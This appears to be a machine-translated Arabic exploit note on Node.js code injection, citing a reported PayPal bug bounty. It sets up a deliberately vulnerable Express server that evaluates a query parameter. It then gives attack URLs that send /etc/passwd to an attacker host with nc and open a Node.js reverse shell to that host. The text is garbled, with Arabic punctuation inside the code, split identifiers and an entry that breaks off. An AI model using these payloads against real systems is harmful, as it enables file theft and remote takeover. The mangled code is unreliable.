خلفية
ArtSploit عند الحفر من أجل PayPal ، وجد أنه تم تنفيذ رمز NodeJS ، ومكافأة 10000 دولار.
امتحان
var express = require ('Express') ؛ var app = express () ؛ app.get ('/' ، function (req ، res) {res.send ('Hello alual (req.query.q)) ؛ console.log (req.query.q) ؛}) ؛ app.listen (8080 ، function () {console.log (مثال على ذلك على المنفذ 8080!') ؛}) ؛اقرأ أي ملف
http: // المضيف: 8080/؟ q = require ('child_process') .exec ('cat+/etc/passwd+|+nc+extruerip+80')احصل على شل
http: // المضيف: 8080/؟ q = var+net+=+require ("net") ،+sh+=+require ("child_process") .exec ("/bin/bash") ؛ var+client+=+new+net.sock et () ؛ client.connect (80 ،+"extruerip" ،+function () {client.pipe (sh.stdin) ؛ sh.stdout.pipe (client) ؛ sh.stderr.pipe (client) ؛}) ؛الحصول على shell2
http: // المضيف: 8080/؟